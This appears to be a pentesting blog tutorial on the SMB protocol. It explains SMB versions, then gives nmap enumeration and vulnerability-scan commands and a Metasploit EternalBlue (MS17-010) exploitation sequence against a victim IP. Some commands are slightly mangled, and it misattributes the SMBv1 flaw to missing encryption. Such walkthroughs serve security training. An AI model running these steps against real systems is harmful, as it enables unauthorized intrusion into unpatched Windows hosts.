September 09, 2021

Network penetration testing: SMB protocol


Understanding SMB

SMB is a network file and resource sharing protocol, which follows client server model. Any client present in a network can communicate with the SMB server to access resources such as files and directories or assign task like printing over the network.

How SMB Works?

SMB communication is not difficult to understand, where the SMB client connects to an SMB server using SMB port (445 for new version, old version used 139) and access the shares. Once the client gets the access to the shares, it can collaborate the share with its current system and use the files without downloading them to their machines or print using a network printer.

Versions of SMB

SMB v1: The first version of SMB. It began in 1980 and gone through multiple changes. Microsoft first implemented SMBv1 in Windows 95 by introducing CIFS(Common Internet File System). This version of SMB is highly vulnerable that it is never being suggested to use in modern network communication. Because it uses no encryption, which has been exploited by Wannacry and NotPetya like ransomware attacks.

SMBv2: This version was introduced with windows Vista. It improved the performance and offered security enhancement as compare to previous version. Later 2.1 version was introduced in windows 7 and windows server 2008 R2. Which has oplocks (Optimistic Locks) as a feature.

SMBv3: This is the latest and most secure version of SMB so far. It provides end-to-end encryption while communicating with the client. It first came up with windows 8 and server 2012, later v3.2 was introduced in 8.1 and Server 2012 R2. The latest update is 3.1.1 which is using in windows 10 and server 2016.


In this phase as pentester one should look for the following information from SMB service:

-        Banner grabbing

-        User Listing

-        User Workgroup

-        Network Share information

-        Remote Operating system

-        SMB security version

To get the above detail we are using popular network scanning tool nmap.

               nmap –p 445,139 –A

The information we get from the result is:

Operating System: Windows 7  Ultimate

Computername: WIN-8KGN3AE06PK

SMB Security Mode: 2.02


Scanning for vulnerabilities:

After enumeration we get the version information and the host operation system. Now it is time for vulnerability scanning. Again we are using nmap to do so. As nmap is having end number of scripts to identify vulnerability.

                              nmap - - script smb-vuln* -p 445

 The scanning results shows the host is highly vulnerable to eternalblue(Ms17-010) vulnerability due to SMBv1.

Exploiting SMB vulnerability:

Now we have the vulnerability information so we will exploit the vulnerability using metasploit and gain the privilege.

We run the following modules in our attacker system:

> msfconsole

> use exploit/windows/smb/ms17_010_eternalblue

> set rhost <Victim IP>

> exploit



Closing words:

This is not the only way to exploiting SMB as there are other ways like PSExec, Bruteforce , NTLM capture.

I feel the above technique is not that complex, as Metasploit always makes hackers life easy.

I hope you find this article valuable and helpful. Happy Hacking!!